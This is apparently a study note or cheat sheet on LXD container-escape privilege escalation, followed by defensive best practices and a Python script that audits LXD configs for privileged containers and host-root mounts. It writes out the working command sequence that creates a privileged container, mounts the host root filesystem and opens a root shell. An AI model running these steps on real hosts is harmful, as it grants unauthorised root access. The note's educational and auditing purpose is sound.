LXC Privilege Escalation Techniques
Check Group Membership
Check if the user is part of the lxd group, which may allow container escapes.
List Available LXC Images
View available LXC images for deployment.
List Available LXD Containers
Check running or existing LXD containers.
Import a Vulnerable LXC Image
Import a vulnerable LXC image for privilege escalation.
Initialize a Privileged LXC Container
Create a new privileged container that may allow access to the host.
Mount the Host's Root Filesystem into the Container
Bind the host's root filesystem inside the container.
Start the LXC Container
Execute a Shell Inside the Container
Gain access to the container's shell.
Access the Host's Root Filesystem from Inside the Container
Mount Host Root to a Running Container
If a container is already running, mount the host's root filesystem dynamically.
Execute a Shell in an Existing Container
Access the Host Root Filesystem
Check If a Container is Privileged
Determine if a container is running with elevated privileges.
List LXD Profiles
View existing LXD profiles that define container configurations.
Show the Configuration of a Given LXD Profile
Inspect the configuration of a specific profile.
Key Concepts:
Containers vs. VMs: Containers use OS-level virtualization, while VMs use hardware-level virtualization.
LXC/LXD:
LXC: Application containers, sharing the host kernel.
LXD: System containers, running a complete OS.
Privilege Escalation: The primary goal is to escape the container and gain root access on the host system.
LXD Group: Membership in the lxd or lxc group is often a prerequisite for exploiting LXD.
Vulnerable Templates: Pre-existing container templates with weak security configurations (e.g., no passwords, privileged settings) are often the attack vector.
security.privileged=true: This is the critical setting that disables container isolation, allowing access to the host.
Host Root Mounting: Mounting the host's root filesystem into the container allows direct access to host files.
Exploitation Steps (as described):
Check Group Membership:
id
Locate Vulnerable Templates:
ls in relevant directories.
Import the Image:
lxc image import ubuntu-template.tar.xz --alias ubuntutemp
List Images:
lxc image list
Initialize a Privileged Container:
lxc init ubuntutemp privesc -c security.privileged=true
Mount Host Root:
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Start the Container:
lxc start privesc
Execute a Shell:
lxc exec privesc /bin/bash
Access Host Files:
ls -l /mnt/root
Important Considerations and Enhancements:
Security Best Practices:
Avoid using privileged containers unless absolutely necessary.
Use strong passwords for container images.
Regularly update container images.
Implement proper access controls.
Use namespaces and cgroups to further isolate containers.
Attack Vectors:
Besides vulnerable templates, other attack vectors include exploiting vulnerabilities in the LXD daemon itself or misconfigurations in container profiles.
Exploiting mounted volumes that are not the root directory.
Capabilities: Container escape can also happen by abusing Linux capabilities.
Detection:
Monitor for unusual container activity.
Audit container configurations.
Use security tools to scan for vulnerabilities.
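One way to audit container configurations for the two settings this page centres on, security.privileged=true and a disk device whose source is the host's /. This is an added example, not code from the original page; it assumes instance records shaped like `lxc list --format json` output with expanded_config and expanded_devices, and the sample records and severity labels are constructed for illustration.

```python
import json
import posixpath

TRUE_VALUES = {"true", "1", "yes", "on"}  # spellings LXD accepts for booleans

# Constructed sample shaped like `lxc list --format json` output (not real data).
SAMPLE = json.loads("""[
 {"name": "privesc", "expanded_config": {"security.privileged": "true"},
  "expanded_devices": {
   "root": {"type": "disk", "path": "/", "pool": "default"},
   "host-root": {"type": "disk", "source": "/", "path": "/mnt/root"}}},
 {"name": "web01", "expanded_config": {},
  "expanded_devices": {
   "root": {"type": "disk", "path": "/", "pool": "default"},
   "logs": {"type": "disk", "source": "/var/log/app/../", "path": "/logs"}}},
 {"name": "db01", "expanded_config": {"security.privileged": "false"},
  "expanded_devices": {"root": {"type": "disk", "path": "/", "pool": "default"}}}
]""")

def audit_instance(inst):
    """Return (severity, message) findings for one instance record."""
    findings = []
    cfg = inst.get("expanded_config") or {}
    privileged = str(cfg.get("security.privileged", "")).lower() in TRUE_VALUES
    if privileged:
        findings.append(("high", "security.privileged is enabled"))
    for dev_name, dev in (inst.get("expanded_devices") or {}).items():
        # A disk with a pool is a managed volume; a disk whose source is an
        # absolute path is a bind mount of that host path into the container.
        src = str(dev.get("source", ""))
        if dev.get("type") != "disk" or "pool" in dev or not src.startswith("/"):
            continue
        src = posixpath.normpath(src)
        if src.strip("/") == "":  # "/", "//" and "/a/.." all mean the host root
            sev = "critical" if privileged else "high"
            findings.append((sev, f"device {dev_name} exposes the host root at {dev.get('path')}"))
        else:
            findings.append(("medium", f"device {dev_name} bind-mounts host path {src}"))
    return findings

def audit(instances):
    """Map instance name -> findings, leaving out instances with none."""
    report = {inst["name"]: audit_instance(inst) for inst in instances}
    return {name: found for name, found in report.items() if found}

if __name__ == "__main__":
    for name, found in audit(SAMPLE).items():
        for severity, message in found:
            print(f"{severity:8} {name}: {message}")
```

Reading the expanded keys matters because a profile can set security.privileged or attach the disk device without either appearing in the instance's own config.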
Containerization Security:
Understanding container security is crucial in modern IT environments.
Tools like Docker Bench for Security and Lynis can help assess container security.
Namespaces: Namespaces are an important part of container security.
Cgroups: Cgroups are an important part of container security.
Real-World Examples: Researching real-world container escapes will help solidify understanding of the attack vectors.
LXD Profiles: Understanding how LXD profiles work and how they can be misconfigured is very important.